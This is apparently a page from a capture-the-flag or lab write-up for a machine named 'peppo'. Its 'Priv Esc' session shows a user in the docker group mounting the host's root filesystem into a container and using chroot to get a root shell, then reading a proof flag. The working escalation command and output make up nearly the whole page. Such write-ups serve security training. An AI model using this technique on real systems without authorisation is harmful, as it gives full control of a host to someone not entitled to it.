Priv Esc

eleanor@peppo:~$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)

eleanor@peppo:~$ docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                    NAMES
326cfee15738        postgres            "docker-entrypoint.s…"   4 years ago         Up 2 months         0.0.0.0:5432->5432/tcp   postgres
71aa857fe988        redmine             "/docker-entrypoint.…"   4 years ago         Up 2 months         0.0.0.0:8080->3000/tcp   redmine
You have mail in /var/mail/eleanor
eleanor@peppo:~$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root
# cat /root/proof.txt
2310ceb7e8770b1db1fe121fa70c33c3
# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.4/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

PreviousEnumeration NextCredentials / Notes / LL

Last updated 8 months ago